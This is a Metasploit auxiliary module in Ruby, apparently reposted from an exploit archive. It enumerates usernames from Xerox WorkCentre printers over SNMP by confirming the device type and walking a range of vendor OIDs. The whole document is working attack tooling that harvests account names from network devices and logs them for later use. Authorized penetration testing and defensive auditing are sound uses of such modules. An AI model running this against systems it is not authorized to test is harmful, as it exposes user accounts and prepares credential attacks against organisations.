Share
## https://sploitus.com/exploit?id=PACKETSTORM:180919
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::SNMPClient  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::Scanner  
  
def initialize  
super(  
'Name' => 'Xerox WorkCentre User Enumeration (SNMP)',  
'Description' => %q{  
This module will do user enumeration based on the Xerox WorkCentre present on the network.  
SNMP is used to extract the usernames.  
},  
'Author' =>  
[  
'pello <fropert[at]packetfault.org>'  
],  
'License' => MSF_LICENSE  
)  
end  
  
def run_host(ip)  
begin  
snmp = connect_snmp  
  
if snmp.get_value('sysDescr.0') =~ /Xerox/  
@users = []  
285222001.upto(285222299) { |oidusernames|  
snmp.walk("1.3.6.1.4.1.253.8.51.5.1.1.4.151.#{oidusernames}") do |row|  
row.each { |val| @users << val.value.to_s if val.value.to_s.length >= 1 }  
end  
}  
print_good("#{ip} Found Users: #{@users.uniq.sort.join(", ")} ")  
  
@users.each do |user|  
report_note(  
:host => rhost,  
:port => datastore['RPORT'],  
:proto => 'udp',  
:sname => 'snmp',  
:update => :unique_data,  
:type => 'xerox.workcenter.user',  
:data => user)  
end  
end  
  
# No need to make noise about timeouts  
rescue ::Rex::ConnectionError, ::SNMP::RequestTimeout, ::SNMP::UnsupportedVersion  
rescue ::Interrupt  
raise $!  
rescue ::Exception => e  
print_error("#{ip} Error: #{e.class} #{e} #{e.backtrace}")  
ensure  
disconnect_snmp  
end  
end  
end